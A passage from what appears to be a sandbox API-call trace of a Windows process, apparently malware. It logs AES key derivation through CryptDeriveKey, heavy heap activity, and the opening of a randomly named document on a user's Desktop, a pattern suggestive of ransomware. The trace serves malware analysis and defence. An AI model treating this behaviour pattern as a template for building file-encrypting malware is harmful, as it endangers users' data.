dwFlags=0x1) returned 1 [0131.830] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.830] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.830] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.830] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.830] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.830] PeekMessageW (in: lpMsg=0x144e4ec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4ec) returned 0 [0131.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0131.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb000, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0131.830] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac280) returned 1 [0131.831] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.831] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.831] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.831] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.831] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.831] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.831] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0131.831] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0131.831] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0131.831] CryptDestroyHash (hHash=0x41ac140) returned 1 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e97a0 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0131.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0131.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0131.831] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb288 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0131.831] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e97a0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0131.832] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c30 | out: hHeap=0x1780000) returned 1 [0131.833] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.833] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb270 | out: hHeap=0x1780000) returned 1 [0131.833] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0131.834] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0131.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e18 [0131.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.835] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0131.835] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0131.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0131.836] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eba98 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0131.836] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0131.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\dcpltjpjl4z2qv.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0131.836] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.836] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0131.837] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0131.837] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0131.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0131.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 